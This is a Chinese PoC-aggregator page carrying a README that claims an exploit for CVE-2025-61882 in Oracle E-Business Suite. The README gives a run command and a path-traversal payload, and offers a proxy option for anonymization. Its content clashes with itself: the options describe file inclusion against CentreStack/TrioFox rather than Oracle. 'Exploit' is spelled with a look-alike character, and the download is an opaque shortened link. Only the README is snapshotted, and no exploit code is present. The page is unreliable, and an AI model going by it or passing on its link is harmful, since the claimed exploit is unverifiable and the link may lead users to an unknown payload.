POC详情: 3c0a6b0e9f9afa691bda9872fc5cdb3358c2a0e4

来源
关联漏洞
标题: Oracle E-Business Suite 安全漏洞 (CVE-2025-61882)
描述:Oracle E-Business Suite是美国甲骨文(Oracle)公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。 Oracle E-Business Suite 12.2.3版本至12.2.14版本存在安全漏洞,该漏洞源于未经验证的攻击者可通过HTTP网络访问进行攻击,可能导致组件接管。
介绍
# CVE-2025-61882

### Overview
The vulnerability allows an unauthenticated attacker with network access via HTTP to completely compromise the Oracle Concurrent Processing system.


### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### How It Works
An attacker can: - Fully take over the Oracle Concurrent Processing system - Potentially gain unauthorized access to confidential data - Modify or delete critical business information - Disrupt business operations - Execute arbitrary code without requiring authentication The attack can be performed remotely over the network without any user interaction, making it extremely dangerous.




### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-61882 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### PoC explоit - [href](https://tinyurl.com/bdhdhmx2)

For any inquiries, please email me at: evilforti@hotmail.com
文件快照

[4.0K] /data/pocs/3c0a6b0e9f9afa691bda9872fc5cdb3358c2a0e4 └── [1.6K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。